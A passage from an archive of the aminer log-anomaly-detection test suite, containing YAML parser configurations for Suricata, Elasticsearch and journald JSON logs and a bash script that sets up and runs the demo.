'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.()' - id: persistence_name type: FixedWordlistDataModelElement name: 'persistence_name' args: - 'Default' - 'suricata_fileinfo' - 'syslog_disconnected_user' - 'exim_no_host_name_found_ip' - 'suricata_err' - id: atom_paths type: VariableByteDataModelElement name: 'atom_paths' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-/' - id: affected_values type: AnyByteDataModelElement name: 'affected_values' - id: timestamps_no_milliseconds type: DateTimeModelElement name: 'timestamps' date_format: '%s' - id: timestamps_with_milliseconds type: DateTimeModelElement name: 'timestamps' date_format: '%s.%f' - id: timestamps type: FirstMatchModelElement name: 'timestamps' args: - timestamps_with_milliseconds - timestamps_no_milliseconds - id: log_lines_count type: DecimalIntegerValueModelElement name: 'log_lines_count' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: AnalysisComponent: AnalysisComponentIdentifier: component_id AnalysisComponentType: component_type AnalysisComponentName: component_name Message: message PersistenceFileName: persistence_name AffectedLogAtomPaths: - atom_paths _AffectedLogAtomValues: - affected_values ParsedLogAtom: 'ALLOW_ALL' LogData: RawLogData: - 'ALLOW_ALL' Timestamps: - timestamps LogLinesCount: log_lines_count Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-demo.sh000077500000000000000000000015211437606560100301140ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null echo "Demo started.." echo "" CFG_PATH=$1 OUT=$2 if ! test -f "$CFG_PATH"; then echo "$CFG_PATH does not exist!" exit 1 fi FOUND=false LOGFILE="" while read p; do if [[ $FOUND = true ]]; then LOGFILE="$p" break fi if [[ "$p" == "LogResourceList:" ]]; then FOUND=true fi done < $CFG_PATH IFS="'" read -ra ADDR <<< "$LOGFILE" LOGFILE="${ADDR[1]:7}" # remove the file:// prefix. runAminerUntilEnd "sudo aminer --config $CFG_PATH" "$LOGFILE" "/tmp/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit $? logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-elastic-demo.yml000066400000000000000000000123021437606560100317210ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/elastic.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: _scroll_id type: Base64StringModelElement name: '_scroll_id' - id: took type: DecimalIntegerValueModelElement name: 'took' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'timed_out' args: - 'true' - 'false' - id: total type: DecimalIntegerValueModelElement name: 'total' - id: successful type: DecimalIntegerValueModelElement name: 'successful' - id: skipped type: DecimalIntegerValueModelElement name: 'skipped' - id: failed type: DecimalIntegerValueModelElement name: 'failed' - id: value type: DecimalIntegerValueModelElement name: 'value' - id: relation type: FixedDataModelElement name: 'relation' args: 'eq' - id: max_score type: DecimalFloatValueModelElement name: 'max_score' - id: _index type: DateTimeModelElement name: '_index' date_format: 'aminer-statusinfo-%Y.%m.%d' - id: _type type: FixedDataModelElement name: '_type' args: '_doc' - id: _id type: VariableByteDataModelElement name: '_id' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_' - id: _score type: DecimalFloatValueModelElement name: '_score' - id: FromTime type: DecimalFloatValueModelElement name: 'FromTime' exponent_type: 'mandatory' - id: /parser/model/php type: DecimalIntegerValueModelElement name: '/parser/model/php' - id: /parser/model/event_type_str type: DecimalIntegerValueModelElement name: '/parser/model/event_type_str' - id: /parser/model/type_str type: DecimalIntegerValueModelElement name: '/parser/model/type_str' - id: /parser/model/classification type: DecimalIntegerValueModelElement name: '/parser/model/classification' - id: /parser/model/status_code type: DecimalIntegerValueModelElement name: '/parser/model/status_code' - id: /parser/model/host type: DecimalIntegerValueModelElement name: '/parser/model/host' - id: /parser/model/sp type: DecimalIntegerValueModelElement name: '/parser/model/sp' - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: ToTime type: DecimalFloatValueModelElement name: 'ToTime' exponent_type: 'mandatory' - id: fromtimestamp type: DateTimeModelElement name: 'fromtimestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: totimestamp type: DateTimeModelElement name: 'totimestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: version type: FixedDataModelElement name: 'version' args: '1' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: _scroll_id: _scroll_id took: took timed_out: bool_wordlist terminated_early: bool_wordlist _shards: total: total successful: successful skipped: skipped failed: failed hits: total: value: value relation: relation max_score: max_score hits: - _index: _index _type: _type _id: _id _score: _score _source: FromTime: FromTime StatusInfo: /parser/model/php: /parser/model/php /parser/model/event_type_str: /parser/model/event_type_str /parser/model/type_str: /parser/model/type_str /parser/model/classification: /parser/model/classification /parser/model/status_code: /parser/model/status_code /parser/model/host: /parser/model/host /parser/model/sp: /parser/model/sp timestamp: timestamp ToTime: ToTime fromtimestamp: fromtimestamp totimestamp: totimestamp version: version Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-eve-demo.yml000066400000000000000000000613441437606560100310660ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/eve.json' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: _flow_id type: DecimalIntegerValueModelElement name: '_flow_id' - id: _in_iface type: FixedDataModelElement name: '_in_iface' args: 'eth0' - id: event_type type: FixedWordlistDataModelElement name: 'event_type' args: - 'dns' - 'http' - 'fileinfo' - 'stats' - 'flow' - 'alert' - 'tls' - id: ip_ipv4 type: IpAddressDataModelElement name: 'ipv4' - id: ip_ipv6 type: VariableByteDataModelElement name: 'ipv6' args: 'abcdefABCDEF0123456789:' - id: _src_ip type: FirstMatchModelElement name: '_src_ip' args: - ip_ipv4 - ip_ipv6 - id: _src_port type: DecimalIntegerValueModelElement name: '_src_port' - id: _dest_ip type: FirstMatchModelElement name: '_dest_ip' args: - ip_ipv4 - ip_ipv6 - id: _dest_port type: DecimalIntegerValueModelElement name: '_dest_port' - id: _proto type: FixedWordlistDataModelElement name: '_proto' args: - 'UDP' - 'TCP' - 'IPv6-ICMP' - id: _icmp_type type: DecimalIntegerValueModelElement name: '_icmp_type' - id: _icmp_code type: DecimalIntegerValueModelElement name: '_icmp_code' - id: type type: FixedWordlistDataModelElement name: 'type' args: - 'answer' - 'query' - id: id type: DecimalIntegerValueModelElement name: 'id' - id: _rcode type: FixedDataModelElement name: '_rcode' args: 'NXDOMAIN' - id: rrname_ip_lower type: DelimitedDataModelElement name: 'rrname_ip_lower' delimiter: '.in-addr.arpa' - id: rrname_addr_lower type: FixedDataModelElement name: 'rrname_addr_lower' args: '.in-addr.arpa' - id: rrname_lower type: SequenceModelElement name: 'rrname' args: - rrname_ip_lower - rrname_addr_lower - id: rrname_ip_upper type: DelimitedDataModelElement name: 'rrname_ip_upper' delimiter: '.IN-ADDR.ARPA' - id: rrname_addr_upper type: FixedDataModelElement name: 'rrname_addr_upper' args: '.IN-ADDR.ARPA' - id: rrname_upper type: SequenceModelElement name: 'rrname' args: - rrname_ip_upper - rrname_addr_upper - id: rrname type: FirstMatchModelElement name: 'rrname' args: - rrname_lower - rrname_upper - id: _rrtype type: FixedWordlistDataModelElement name: '_rrtype' args: - 'SOA' - 'PTR' - id: _ttl type: DecimalIntegerValueModelElement name: '_ttl' - id: _tx_id type: DecimalIntegerValueModelElement name: '_tx_id' - id: hostname type: FixedDataModelElement name: 'hostname' args: 'mail.spiral.com' - id: url type: VariableByteDataModelElement name: 'url' args: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.;&=+$,/?%#\ - id: http_user_agent type: FixedWordlistDataModelElement name: 'http_user_agent' args: - 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0' - 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 HeadlessChrome/77.0.3865.90 Safari/537.36' - id: _http_content_type type: FixedWordlistDataModelElement name: '_http_content_type' args: - 'text/html' - 'image/png' - 'application/javascript' - 'text/css' - 'image/vnd.microsoft.icon' - 'application/json' - 'image/gif' - 'audio/x-wav' - id: http_refer_base_url type: FixedDataModelElement name: 'http_refer_base_url' args: 'http://mail.spiral.com/' - id: optional_http_refer_base_url type: OptionalMatchModelElement name: 'optional_http_refer_base_url' args: http_refer_base_url - id: _http_refer type: SequenceModelElement name: '_http_refer' args: - http_refer_base_url - url - id: http_method type: FixedWordlistDataModelElement name: 'http_method' args: - 'GET' - 'POST' - id: protocol type: FixedDataModelElement name: 'protocol' args: 'HTTP/1.1' - id: _status type: DecimalIntegerValueModelElement name: '_status' - id: _redirect type: SequenceModelElement name: '_redirect' args: - optional_http_refer_base_url - url - id: length type: DecimalIntegerValueModelElement name: 'length' - id: _app_proto type: FixedWordlistDataModelElement name: '_app_proto' args: - 'http' - 'failed' - 'dns' - 'tls' - id: _app_proto_tc type: FixedDataModelElement name: '_app_proto_tc' args: 'http' - id: file_state type: FixedWordlistDataModelElement name: 'state' args: - 'CLOSED' - 'TRUNCATED' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'bool' args: - 'true' - 'false' - id: size type: DecimalIntegerValueModelElement name: 'size' - id: pkts_toserver type: DecimalIntegerValueModelElement name: 'pkts_toserver' - id: pkts_toclient type: DecimalIntegerValueModelElement name: 'pkts_toclient' - id: bytes_toserver type: DecimalIntegerValueModelElement name: 'bytes_toserver' - id: bytes_toclient type: DecimalIntegerValueModelElement name: 'bytes_toclient' - id: start type: DateTimeModelElement name: 'start' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: end type: DateTimeModelElement name: 'end' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: age type: DecimalIntegerValueModelElement name: 'age' - id: conn_state type: FixedWordlistDataModelElement name: 'state' args: - 'established' - 'closed' - 'fin_wait2' - 'new' - id: reason type: FixedWordlistDataModelElement name: 'reason' args: - 'timeout' - id: uptime type: DecimalIntegerValueModelElement name: 'uptime' - id: kernel_packets type: DecimalIntegerValueModelElement name: 'kernel_packets' - id: kernel_drops type: DecimalIntegerValueModelElement name: 'kernel_drops' - id: pkts type: DecimalIntegerValueModelElement name: 'pkts' - id: bytes type: DecimalIntegerValueModelElement name: 'bytes' - id: invalid type: DecimalIntegerValueModelElement name: 'invalid' - id: ipv4 type: DecimalIntegerValueModelElement name: 'ipv4' - id: ipv6 type: DecimalIntegerValueModelElement name: 'ipv6' - id: ethernet type: DecimalIntegerValueModelElement name: 'ethernet' - id: raw type: DecimalIntegerValueModelElement name: 'raw' - id: null_counts type: DecimalIntegerValueModelElement name: 'null' - id: sll type: DecimalIntegerValueModelElement name: 'sll' - id: tcp type: DecimalIntegerValueModelElement name: 'tcp' - id: udp type: DecimalIntegerValueModelElement name: 'udp' - id: sctp type: DecimalIntegerValueModelElement name: 'sctp' - id: icmpv4 type: DecimalIntegerValueModelElement name: 'icmpv4' - id: icmpv6 type: DecimalIntegerValueModelElement name: 'icmpv6' - id: ppp type: DecimalIntegerValueModelElement name: 'ppp' - id: pppoe type: DecimalIntegerValueModelElement name: 'pppoe' - id: gre type: DecimalIntegerValueModelElement name: 'gre' - id: vlan type: DecimalIntegerValueModelElement name: 'vlan' - id: vlan_qinq type: DecimalIntegerValueModelElement name: 'vlan_qinq' - id: teredo type: DecimalIntegerValueModelElement name: 'teredo' - id: ipv4_in_ipv6 type: DecimalIntegerValueModelElement name: 'ipv4_in_ipv6' - id: ipv6_in_ipv6 type: DecimalIntegerValueModelElement name: 'ipv6_in_ipv6' - id: mpls type: DecimalIntegerValueModelElement name: 'mpls' - id: avg_pkt_size type: DecimalIntegerValueModelElement name: 'avg_pkt_size' - id: max_pkt_size type: DecimalIntegerValueModelElement name: 'max_pkt_size' - id: erspan type: DecimalIntegerValueModelElement name: 'erspan' - id: invalid_ip_version type: DecimalIntegerValueModelElement name: 'invalid_ip_version' - id: pkt_too_small type: DecimalIntegerValueModelElement name: 'pkt_too_small' - id: unsupported_type type: DecimalIntegerValueModelElement name: 'unsupported_type' - id: memcap type: DecimalIntegerValueModelElement name: 'memcap' - id: spare type: DecimalIntegerValueModelElement name: 'spare' - id: emerg_mode_entered type: DecimalIntegerValueModelElement name: 'emerg_mode_entered' - id: emerg_mode_over type: DecimalIntegerValueModelElement name: 'emerg_mode_over' - id: tcp_reuse type: DecimalIntegerValueModelElement name: 'tcp_reuse' - id: memuse type: DecimalIntegerValueModelElement name: 'memuse' - id: fragments type: DecimalIntegerValueModelElement name: 'fragments' - id: reassembled type: DecimalIntegerValueModelElement name: 'reassembled' - id: timeouts type: DecimalIntegerValueModelElement name: 'timeouts' - id: max_frag_hits type: DecimalIntegerValueModelElement name: 'max_frag_hits' - id: sessions type: DecimalIntegerValueModelElement name: 'sessions' - id: ssn_memcap_drop type: DecimalIntegerValueModelElement name: 'ssn_memcap_drop' - id: pseudo type: DecimalIntegerValueModelElement name: 'pseudo' - id: pseudo_failed type: DecimalIntegerValueModelElement name: 'pseudo_failed' - id: invalid_checksum type: DecimalIntegerValueModelElement name: 'invalid_checksum' - id: no_flow type: DecimalIntegerValueModelElement name: 'no_flow' - id: syn type: DecimalIntegerValueModelElement name: 'syn' - id: synack type: DecimalIntegerValueModelElement name: 'synack' - id: rst type: DecimalIntegerValueModelElement name: 'rst' - id: segment_memcap_drop type: DecimalIntegerValueModelElement name: 'segment_memcap_drop' - id: stream_depth_reached type: DecimalIntegerValueModelElement name: 'stream_depth_reached' - id: reassembly_gap type: DecimalIntegerValueModelElement name: 'reassembly_gap' - id: reassembly_memuse type: DecimalIntegerValueModelElement name: 'reassembly_memuse' - id: alert type: DecimalIntegerValueModelElement name: 'alert' - id: http type: DecimalIntegerValueModelElement name: 'http' - id: ftp type: DecimalIntegerValueModelElement name: 'ftp' - id: smtp type: DecimalIntegerValueModelElement name: 'smtp' - id: tls type: DecimalIntegerValueModelElement name: 'tls' - id: ssh type: DecimalIntegerValueModelElement name: 'ssh' - id: imap type: DecimalIntegerValueModelElement name: 'imap' - id: msn type: DecimalIntegerValueModelElement name: 'msn' - id: smb type: DecimalIntegerValueModelElement name: 'smb' - id: dcerpc_tcp type: DecimalIntegerValueModelElement name: 'dcerpc_tcp' - id: dns_tcp type: DecimalIntegerValueModelElement name: 'dns_tcp' - id: failed_tcp type: DecimalIntegerValueModelElement name: 'failed_tcp' - id: dcerpc_udp type: DecimalIntegerValueModelElement name: 'dcerpc_udp' - id: dns_udp type: DecimalIntegerValueModelElement name: 'dns_udp' - id: failed_udp type: DecimalIntegerValueModelElement name: 'failed_udp' - id: closed_pruned type: DecimalIntegerValueModelElement name: 'closed_pruned' - id: new_pruned type: DecimalIntegerValueModelElement name: 'new_pruned' - id: est_pruned type: DecimalIntegerValueModelElement name: 'est_pruned' - id: bypassed_pruned type: DecimalIntegerValueModelElement name: 'bypassed_pruned' - id: flows_checked type: DecimalIntegerValueModelElement name: 'flows_checked' - id: flows_notimeout type: DecimalIntegerValueModelElement name: 'flows_notimeout' - id: flows_timeout type: DecimalIntegerValueModelElement name: 'flows_timeout' - id: flows_timeout_inuse type: DecimalIntegerValueModelElement name: 'flows_timeout_inuse' - id: flows_removed type: DecimalIntegerValueModelElement name: 'flows_removed' - id: rows_checked type: DecimalIntegerValueModelElement name: 'rows_checked' - id: rows_skipped type: DecimalIntegerValueModelElement name: 'rows_skipped' - id: rows_empty type: DecimalIntegerValueModelElement name: 'rows_empty' - id: rows_busy type: DecimalIntegerValueModelElement name: 'rows_busy' - id: rows_maxlen type: DecimalIntegerValueModelElement name: 'rows_maxlen' - id: memcap_state type: DecimalIntegerValueModelElement name: 'memcap_state' - id: memcap_global type: DecimalIntegerValueModelElement name: 'memcap_global' - id: tcp_flags type: FixedWordlistDataModelElement name: 'tcp_flags' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: tcp_flags_ts type: FixedWordlistDataModelElement name: 'tcp_flags_ts' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: tcp_flags_tc type: FixedWordlistDataModelElement name: 'tcp_flags_tc' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: action type: FixedWordlistDataModelElement name: 'action' args: - 'allowed' - id: gid type: DecimalIntegerValueModelElement name: 'gid' - id: signature_id type: DecimalIntegerValueModelElement name: 'signature_id' - id: rev type: DecimalIntegerValueModelElement name: 'rev' - id: signature type: FixedWordlistDataModelElement name: 'signature' args: - 'ET POLICY Http Client Body contains pass= in cleartext' - id: category type: FixedWordlistDataModelElement name: 'category' args: - 'Potential Corporate Privacy Violation' - id: severity type: DecimalIntegerValueModelElement name: 'severity' - id: subject type: FixedDataModelElement name: 'subject' args: 'CN=mail.spiral.com' - id: issuerdn type: FixedDataModelElement name: 'issuerdn' args: 'CN=ChangeMe' - id: fingerprint type: FixedDataModelElement name: 'fingerprint' args: '4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17' - id: sni type: FixedDataModelElement name: 'sni' args: 'mail.spiral.com' - id: version type: FixedDataModelElement name: 'version' args: 'TLS 1.2' - id: notbefore type: DateTimeModelElement name: 'notbefore' date_format: '%Y-%m-%dT%H:%M:%S' - id: notafter type: DateTimeModelElement name: 'notafter' date_format: '%Y-%m-%dT%H:%M:%S' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: timestamp: timestamp _flow_id: _flow_id _in_iface: _in_iface event_type: event_type _src_ip: _src_ip _src_port: _src_port _dest_ip: _dest_ip _dest_port: _dest_port _proto: _proto _icmp_type: _icmp_type _icmp_code: _icmp_code _dns: type: type id: id _rcode: _rcode rrname: rrname _rrtype: _rrtype _ttl: _ttl _tx_id: _tx_id _tx_id: _tx_id _http: hostname: hostname url: url http_user_agent: http_user_agent _http_content_type: _http_content_type _http_refer: _http_refer http_method: http_method protocol: protocol _redirect: _redirect _status: _status length: length _app_proto: _app_proto _app_proto_tc: _app_proto_tc _fileinfo: filename: url state: file_state stored: bool_wordlist size: size _tx_id: _tx_id _flow: pkts_toserver: pkts_toserver pkts_toclient: pkts_toclient bytes_toserver: bytes_toserver bytes_toclient: bytes_toclient start: start end: end age: age state: conn_state reason: reason alerted: bool_wordlist _stats: uptime: uptime capture: kernel_packets: kernel_packets kernel_drops: kernel_drops decoder: pkts: pkts bytes: bytes invalid: invalid ipv4: ipv4 ipv6: ipv6 ethernet: ethernet raw: raw null: null_counts sll: sll tcp: tcp udp: udp sctp: sctp icmpv4: icmpv4 icmpv6: icmpv6 ppp: ppp pppoe: pppoe gre: gre vlan: vlan vlan_qinq: vlan_qinq teredo: teredo ipv4_in_ipv6: ipv4_in_ipv6 ipv6_in_ipv6: ipv6_in_ipv6 mpls: mpls avg_pkt_size: avg_pkt_size max_pkt_size: max_pkt_size erspan: erspan ipraw: invalid_ip_version: invalid_ip_version ltnull: pkt_too_small: pkt_too_small unsupported_type: unsupported_type dce: pkt_too_small: pkt_too_small flow: memcap: memcap spare: spare emerg_mode_entered: emerg_mode_entered emerg_mode_over: emerg_mode_over tcp_reuse: tcp_reuse memuse: memuse defrag: ipv4: fragments: fragments reassembled: reassembled timeouts: timeouts ipv6: fragments: fragments reassembled: reassembled timeouts: timeouts max_frag_hits: max_frag_hits tcp: sessions: sessions ssn_memcap_drop: ssn_memcap_drop pseudo: pseudo pseudo_failed: pseudo_failed invalid_checksum: invalid_checksum no_flow: no_flow syn: syn synack: synack rst: rst segment_memcap_drop: segment_memcap_drop stream_depth_reached: stream_depth_reached reassembly_gap: reassembly_gap memuse: memuse reassembly_memuse: reassembly_memuse detect: alert: alert app_layer: flow: http: http ftp: ftp smtp: smtp tls: tls ssh: ssh imap: imap msn: msn smb: smb dcerpc_tcp: dcerpc_tcp dns_tcp: dns_tcp failed_tcp: failed_tcp dcerpc_udp: dcerpc_udp dns_udp: dns_udp failed_udp: failed_udp tx: http: http smtp: smtp tls: tls dns_tcp: dns_tcp dns_udp: dns_udp flow_mgr: closed_pruned: closed_pruned new_pruned: new_pruned est_pruned: est_pruned bypassed_pruned: bypassed_pruned flows_checked: flows_checked flows_notimeout: flows_notimeout flows_timeout: flows_timeout flows_timeout_inuse: flows_timeout_inuse flows_removed: flows_removed rows_checked: rows_checked rows_skipped: rows_skipped rows_empty: rows_empty rows_busy: rows_busy rows_maxlen: rows_maxlen dns: memuse: memuse memcap_state: memcap_state memcap_global: memcap_global http: memuse: memuse memcap: memcap _tcp: tcp_flags: tcp_flags tcp_flags_ts: tcp_flags_ts tcp_flags_tc: tcp_flags_tc syn: bool_wordlist _fin: bool_wordlist _rst: bool_wordlist _psh: bool_wordlist ack: bool_wordlist state: conn_state _alert: action: action gid: gid signature_id: signature_id rev: rev signature: signature category: category severity: severity _tls: subject: subject issuerdn: issuerdn fingerprint: fingerprint sni: sni version: version notbefore: notbefore notafter: notafter Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-input-demo-config.yml000066400000000000000000000042471437606560100327100ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/syslog' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: id type: VariableByteDataModelElement name: 'id' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' - id: value type: VariableByteDataModelElement name: 'value' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' - id: buttonNames type: FixedWordlistDataModelElement name: 'buttonNames' args: - 'New' - 'Open' - 'Close' - id: buttonOnclick type: FixedWordlistDataModelElement name: 'buttonOnclick' args: - 'CreateNewDoc()' - 'OpenDoc()' - 'CloseDoc()' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: menu: id: id value: value popup: menuitem: - value: buttonNames onclick: buttonOnclick Input: timestamp_paths: None json_format: True Analysis: - type: NewMatchPathValueComboDetector id: NewMatchPathValueCombo paths: - "/model/menu/id" - "/model/menu/value" learn_mode: True - type: NewMatchPathValueDetector id: NewMatchPathValue paths: - "/model/menu/id" - "/model/menu/value" learn_mode: True - type: SimpleUnparsedAtomHandler id: SimpleUnparsedAtomHandler EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-journal-demo.yml000066400000000000000000000765451437606560100317720ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/journal.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: delimiter type: DelimitedDataModelElement name: 'delimiter' delimiter: '=' consume_delimiter: true - id: hex type: HexStringModelElement name: 'hex' - id: __CURSOR type: SequenceModelElement name: '__CURSOR' args: - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - delimiter - hex - id: __REALTIME_TIMESTAMP type: DateTimeModelElement name: '__REALTIME_TIMESTAMP' date_format: '%s' - id: __MONOTONIC_TIMESTAMP type: DateTimeModelElement name: '__MONOTONIC_TIMESTAMP' date_format: '%s' - id: _BOOT_ID type: HexStringModelElement name: '_BOOT_ID' - id: optional_key__SOURCE_MONOTONIC_TIMESTAMP type: DateTimeModelElement name: 'optional_key__SOURCE_MONOTONIC_TIMESTAMP' date_format: '%s' - id: _TRANSPORT type: FixedWordlistDataModelElement name: '_TRANSPORT' args: - 'kernel' - 'stdout' - 'driver' - 'journal' - 'audit' - 'syslog' - id: optional_key_PRIORITY type: DecimalIntegerValueModelElement name: 'optional_key_PRIORITY' - id: optional_key__KERNEL_SUBSYSTEM type: FixedWordlistDataModelElement name: 'optional_key__KERNEL_SUBSYSTEM' args: - 'acpi' - 'pci_bus' - 'pci' - 'ubs' - 'pnp' - 'scsi' - 'usb' - 'misc' - 'virtio' - 'hid' - id: optional_key__KERNEL_DEVICE type: FixedWordlistDataModelElement name: 'optional_key__KERNEL_DEVICE' args: - '+acpi:PNP0A03:00' - '+pci_bus:0000:00' - '+pci:0000:00:00.0' - '+pci:0000:00:01.0' - '+pci:0000:00:01.1' - '+pci:0000:00:01.2' - '+pci:0000:00:01.3' - '+pci:0000:00:02.0' - '+pci:0000:00:03.0' - '+pci:0000:00:04.0' - '+pci:0000:00:05.0' - '+pnp:00:00' - '+pnp:00:01' - '+pnp:00:02' - '+pnp:00:03' - '+pnp:00:04' - '+scsi:host0' - '+scsi:host1' - 'c189:0' - '+usb:1-0:1.0' - '+usb:1-1' - 'c10:236' - '+virtio:virtio0' - 'c189:1' - '+hid:0003:0627:0001.0001' - id: optional_key__UDEV_DEVNODE type: FixedWordlistDataModelElement name: 'optional_key__UDEV_DEVNODE' args: - '/dev/bus/usb/001/001' - '/dev/bus/usb/001/002' - '/dev/mapper/control' - id: optional_key__UDEV_SYSNAME type: FixedWordlistDataModelElement name: 'optional_key__UDEV_SYSNAME' args: - 'PNP0A03:00' - 'usb1' - 'host0' - 'host1' - '00:00' - '00:01' - '00:02' - '00:03' - '00:04' - '0000:00:00.0' - '0000:00:01.0' - '0000:00:01.1' - '0000:00:01.2' - '0000:00:01.3' - '0000:00:02.0' - '0000:00:03.0' - '0000:00:04.0' - '0000:00:05.0' - '0000:00' - '1-0:1.0' - '1-1' - 'device-mapper' - 'virtio0' - '0003:0627:0001.0001' - id: SYSLOG_FACILITY type: DecimalIntegerValueModelElement name: 'SYSLOG_FACILITY' - id: optional_key_CODE_FILE type: FixedWordlistDataModelElement name: 'optional_key_CODE_FILE' args: - '../src/modules-load/modules-load.c' - '../src/core/unit.c' - '../src/udev/net/ethtool-util.c' - '../src/network/networkd.c' - '../src/resolve/resolved-dns-trust-anchor.c' - '../src/login/logind-seat.c' - '../src/core/manager.c' - '../src/login/logind-session.c' - '../src/core/job.c' - '../src/network/networkd-link.c' - '../src/timesync/timesyncd-manager.c' - '../src/network/networkd-dhcp6.c' - '../src/network/networkd-dhcp4.c' - '../src/resolve/resolved-manager.c' - '../src/network/wait-online/manager.c' - '../src/network/networkd-manager.c' - '../src/login/logind-button.c' - '../src/hostname/hostnamed.c' - '../src/resolve/resolved-dns-transaction.c' - id: optional_key_CODE_LINE type: DecimalIntegerValueModelElement name: 'optional_key_CODE_LINE' - id: optional_key_CODE_FUNC type: FixedWordlistDataModelElement name: 'optional_key_CODE_FUNC' args: - 'load_module' - 'unit_status_log_starting_stopping_reloading' - 'job_log_status_message' - 'ethtool_set_glinksettings' - 'main' - 'dns_trust_anchor_dump' - 'seat_start' - 'manager_notify_finished' - 'session_start' - 'link_update' - 'manager_network_event_handler' - 'link_ipv6ll_gained' - 'dhcp6_verify_link' - 